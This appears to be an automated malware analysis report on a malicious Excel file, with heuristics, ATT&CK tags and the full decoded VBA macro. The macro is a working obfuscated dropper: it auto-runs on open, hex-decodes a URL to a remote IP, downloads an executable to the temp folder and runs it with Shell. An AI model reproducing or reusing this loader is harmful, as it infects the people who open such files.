Verdict: MALICIOUS
Risk Score: 326

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic; T1105 Ingress Tool Transfer
The sample is an Excel file containing obfuscated VBA macros, including an AutoOpen subroutine. Critical heuristics indicate use of the URLDownloadToFile API and a potential Shell call, suggesting the macro's purpose is to download a second-stage payload from a remote location and execute it. The obfuscation and the use of a standard API for downloading files are common tactics for malware droppers.
Heuristics (10)

- Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD): Reference to URLDownloadToFile API.
- VBA macros detected (medium, OLE_VBA_MACROS, 7 related findings): Document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `pHUdsfd = Shell(oGYUIgiu, 1)`
- URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD): URLDownloadToFile in VBA. Matched line in script: `Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _`
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `pHUdsfd = Shell(oGYUIgiu, 1)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script: `Sub Workbook_Open()`
- Environ() call (low, OLE_VBA_ENVIRON): Environ() call (environment variable access). Matched line in script: `oGYUIgiu = Environ(BUHVugrue("54454D50")) & BUHVugrue("5C5547766466672E657865")`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7773 bytes |

SHA-256: 36f4cb6422157c5370bf5de2a7b8be193f79494d0d4339f91491793702eeb406
Detection

- ClamAV: No threats found
- Obfuscation or payload: likely. 65 of 113 identifiers look randomly generated (e.g. 'UJeTKZjRRErSpBP'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal dsfdsfdsf As LongPtr, _
ByVal rtyeffg As String, _
ByVal fdger As String, _
ByVal reteruywer As Long, _
ByVal werwedsf As LongPtr) As LongPtr
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal dsfdsfdsf As Long, _
ByVal rtyeffg As String, _
ByVal fdger As String, _
ByVal reteruywer As Long, _
ByVal werwedsf As Long) As Long
#End If
Sub werwehytef()
Dim QOBXhmAl As Integer
For QOBXhmAl = 0 To 3
Dim kXJALATO As Integer
For kXJALATO = 0 To 5
Dim DwptkYLg As Integer
For DwptkYLg = 0 To 9
DoEvents
Next DwptkYLg
DoEvents
Next kXJALATO
Dim tlwoFgep As Integer
For tlwoFgep = 0 To 3
DoEvents
Next tlwoFgep
DoEvents
Next QOBXhmAl
Dim vtRZaliF As Integer
For vtRZaliF = 0 To 6
Dim pHKvosSI As Integer
For pHKvosSI = 0 To 4
DoEvents
Next pHKvosSI
DoEvents
Next vtRZaliF
Dim flWdzivJ As Integer
For flWdzivJ = 0 To 7
DoEvents
Next flWdzivJ
sdfsdwee
End Sub
Sub AutoOpen()
Dim VpUsliln As Integer
For VpUsliln = 0 To 2
Dim SAYlUiXp As Integer
For SAYlUiXp = 0 To 6
Dim XlKwlndr As Integer
For XlKwlndr = 0 To 5
DoEvents
Next XlKwlndr
DoEvents
Next SAYlUiXp
Dim NWWpsxNd As Integer
For NWWpsxNd = 0 To 8
DoEvents
Next NWWpsxNd
DoEvents
Next VpUsliln
Dim HrOinrOl As Integer
For HrOinrOl = 0 To 6
Dim MRKwlEzM As Integer
For MRKwlEzM = 0 To 7
DoEvents
Next MRKwlEzM
DoEvents
Next HrOinrOl
Dim VuWpsbFr As Integer
For VuWpsbFr = 0 To 8
DoEvents
Next VuWpsbFr
werwehytef
End Sub
Sub Workbook_Open()
Dim fkNGSJaZ As Integer
For fkNGSJaZ = 0 To 1
Dim vofHhwnj As Integer
For vofHhwnj = 0 To 6
Dim WZzOiENz As Integer
For WZzOiENz = 0 To 1
DoEvents
Next WZzOiENz
DoEvents
Next vofHhwnj
Dim UedLuKbT As Integer
For UedLuKbT = 0 To 8
DoEvents
Next UedLuKbT
DoEvents
Next fkNGSJaZ
Dim vrUjKxcT As Integer
For vrUjKxcT = 0 To 6
Dim fkaGOdrn As Integer
For fkaGOdrn = 0 To 5
DoEvents
Next fkaGOdrn
DoEvents
Next vrUjKxcT
Dim itRnfloL As Integer
For itRnfloL = 0 To 3
DoEvents
Next itRnfloL
werwehytef
End Sub
Sub sdfsdwee()
Dim nKOyHRKO As Integer
For nKOyHRKO = 0 To 7
Dim fjaGYIub As Integer
For fjaGYIub = 0 To 1
Dim DcXpaUZB As Integer
For DcXpaUZB = 0 To 3
DoEvents
Next DcXpaUZB
DoEvents
Next fjaGYIub
Dim nVumNXzZ As Integer
For nVumNXzZ = 0 To 1
DoEvents
Next nVumNXzZ
DoEvents
Next nKOyHRKO
Dim kLrEvRLI As Integer
For kLrEvRLI = 0 To 2
Dim KJSNNToS As Integer
For KJSNNToS = 0 To 7
DoEvents
Next KJSNNToS
DoEvents
Next kLrEvRLI
Dim SRhPEQft As Integer
For SRhPEQft = 0 To 5
DoEvents
Next SRhPEQft
Next SRhPEQft
HBBJK = BUHVugrue("6874")
hkhnioki = BUHVugrue("74703A2F2F")
hojdsfg = BUHVugrue("39352E3136332E3132312E37313A383038302F6D6F7073692F706F7073692E706870")
uyVUHjdg = HBBJK + hkhnioki + hojdsfg
Dim lGxtiFPa As Integer
For lGxtiFPa = 0 To 2
Dim eEwdmMHl As Integer
For eEwdmMHl = 0 To 5
Dim QYosYDRG As Integer
For QYosYDRG = 0 To 2
DoEvents
Next QYosYDRG
DoEvents
Next eEwdmMHl
Dim vulxTzrl As Integer
For vulxTzrl = 0 To 9
DoEvents
Next vulxTzrl
DoEvents
Next lGxtiFPa
Dim uyvadHZZ As Integer
For uyvadHZZ = 0 To 6
Dim MYIgMYac As Integer
For MYIgMYac = 0 To 1
DoEvents
Next MYIgMYac
DoEvents
Next uyvadHZZ
Dim lSPogoeg As Integer
For lSPogoeg = 0 To 6
DoEvents
Next lSPogoeg
oGYUIgiu = Environ(BUHVugrue("54454D50")) & BUHVugrue("5C5547766466672E657865")
Dim AFzUlTGV As Integer
For AFzUlTGV = 0 To 9
Dim ysVaDJCV As Integer
For ysVaDJCV = 0 To 7
Dim lFAFtXdl As Integer
For lFAFtXdl = 0 To 2
DoEvents
Next lFAFtXdl
DoEvents
Next ysVaDJCV
Dim UtrTsIYm As Integer
For UtrTsIYm = 0 To 5
DoEvents
Next UtrTsIYm
DoEvents
Next AFzUlTGV
Dim NBASjVzj As Integer
For NBASjVzj = 0 To 8
Dim eRlvndEb As Integer
For eRlvndEb = 0 To 6
DoEvents
Next eRlvndEb
DoEvents
Next NBASjVzj
Dim kWWhUBVb As Integer
For kWWhUBVb = 0 To 9
DoEvents
Next kWWhUBVb
eUUsdgf = URLDownloadToFile(0&, uyVUHjdg, oGYUIgiu, 0&, 0&)
Dim pHUdsfd
Dim mAYkCQMj As Integer
For mAYkCQMj = 0 To 8
Dim TfgSUebU As Integer
For TfgSUebU = 0 To 4
Dim lIaKjaFk As Integer
For lIaKjaFk = 0 To 2
DoEvents
Next lIaKjaFk
DoEvents
Next TfgSUebU
Dim IBADqvaD As Integer
For IBADqvaD = 0 To 5
DoEvents
Next IBADqvaD
DoEvents
Next mAYkCQMj
Dim lFbXYkVq As Integer
For lFbXYkVq = 0 To 2
Dim bzGSzOfn As Integer
For bzGSzOfn = 0 To 3
DoEvents
Next bzGSzOfn
DoEvents
Next lFbXYkVq
Dim zFnLDitd As Integer
For zFnLDitd = 0 To 6
DoEvents
Next zFnLDitd
pHUdsfd = Shell(oGYUIgiu, 1)
End Sub
Public Function BUHVugrue(ByVal UJeTKZjRRErSpBP As String) As String
For GAqVffe = 1 To Len(UJeTKZjRRErSpBP) Step 2
Dim GCYINvKW As Integer
For GCYINvKW = 0 To 9
Dim GBcmygBP As Integer
For GBcmygBP = 0 To 4
Dim VBWAuLfD As Integer
For VBWAuLfD = 0 To 7
DoEvents
Next VBWAuLfD
DoEvents
Next GBcmygBP
Dim hXiYEAvI As Integer
For hXiYEAvI = 0 To 2
DoEvents
Next hXiYEAvI
DoEvents
Next GCYINvKW
Dim XupwfuAF As Integer
For XupwfuAF = 0 To 5
Dim nUCwEhDX As Integer
For nUCwEhDX = 0 To 3
DoEvents
Next nUCwEhDX
DoEvents
Next XupwfuAF
Dim RpNpxsby As Integer
For RpNpxsby = 0 To 4
DoEvents
Next RpNpxsby
OAEeSPJcZw = Chr(CDbl(Chr(38) & Chr(72) & Mid$(UJeTKZjRRErSpBP, GAqVffe, 2)))
Dim DuDiCbga As Integer
For DuDiCbga = 0 To 6
Dim KYaocdyh As Integer
For KYaocdyh = 0 To 1
Dim WdSgkWrx As Integer
For WdSgkWrx = 0 To 1
DoEvents
Next WdSgkWrx
DoEvents
Next KYaocdyh
Dim OSNdzeBF As Integer
For OSNdzeBF = 0 To 8
DoEvents
Next OSNdzeBF
DoEvents
Next DuDiCbga
Dim pRddMWhq As Integer
For pRddMWhq = 0 To 2
Dim MxHzzJfz As Integer
For MxHzzJfz = 0 To 1
DoEvents
Next MxHzzJfz
DoEvents
Next pRddMWhq
Dim UVNdayDT As Integer
For UVNdayDT = 0 To 1
DoEvents
Next UVNdayDT
qwsEHVrtCMHkAS = qwsEHVrtCMHkAS & OAEeSPJcZw
Next GAqVffe
Dim JOHXGwzq As Integer
For JOHXGwzq = 0 To 6
Dim iMLSjCiD As Integer
For iMLSjCiD = 0 To 6
Dim ToNdaoAx As Integer
For ToNdaoAx = 0 To 8
DoEvents
Next ToNdaoAx
DoEvents
Next iMLSjCiD
Dim vCRVRgYG As Integer
For vCRVRgYG = 0 To 6
DoEvents
Next vCRVRgYG
DoEvents
Next JOHXGwzq
Dim iGddLVrz As Integer
For iGddLVrz = 0 To 6
Dim tqkMiOqQ As Integer
For tqkMiOqQ = 0 To 3
DoEvents
Next tqkMiOqQ
DoEvents
Next iGddLVrz
Dim JQZruVPf As Integer
For JQZruVPf = 0 To 1
DoEvents
Next JQZruVPf
BUHVugrue = qwsEHVrtCMHkAS
End Function
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True